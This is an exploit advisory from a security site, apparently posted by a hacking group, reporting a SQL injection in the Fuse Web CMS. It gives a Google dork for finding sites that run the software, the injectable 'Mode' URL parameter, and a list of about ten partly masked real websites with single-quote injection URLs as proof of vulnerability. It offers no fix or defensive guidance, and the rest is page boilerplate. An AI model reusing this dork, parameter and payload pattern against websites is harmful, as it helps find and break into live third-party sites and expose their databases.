Fuse Web SQL Injection

2013.09.15
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| |-------------------------------------------------------------------------| | [*] Exploit Title: Fuse Web SQL Injection | | [*] Exploit Author: Ashiyane Digital Security Team | | [*] Software Link : http://www.fuse.no | | [*] Google Dork: intext:"Powered by Fuse Web" | | [*] Tested on: Windows,Linux | | [*] Date : 2013/09/14 |-------------------------------------------------------------------------| | [*] Exploit 1 : Sql Injection | [*] Location : [Target]/?HovedMenyId=&InnholdMenyId=&Mode=[Sql Injection] | | [*] Proof: | | [*] http://www.bjXom/?HovedMenyId=&InnholdMenyId=&Mode=' | | [*] http://www.X/?HovedMenyId=&InnholdMenyId=&Mode=' | | [*] http://wX/?HovedMenyId=&InnholdMenyId=&Mode=' | | [*] http://wwX/?HovedMenyId=&InnholdMenyId=&Mode=' | | [*] http://wwXno/?HovedMenyId=&InnholdMenyId=&Mode=' | | [*] http://X.no/?HovedMenyId=&InnholdMenyId=&Mode=' | | [*] http://wwXno/?HovedMenyId=&InnholdMenyId=&Mode=' | | [*] http://wwXning.no/?HovedMenyId=&InnholdMenyId=&Mode=' | | [*] http://stabbuXkk.no/?HovedMenyId=&InnholdMenyId=&Mode=' | | [*] http://www.romXXaard.no/?HovedMenyId=&InnholdMenyId=&Mode=' |-------------------------------------------------------------------------| | [*] Discovered By : ACC3SS |-------------------------------------------------------------------------| |#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top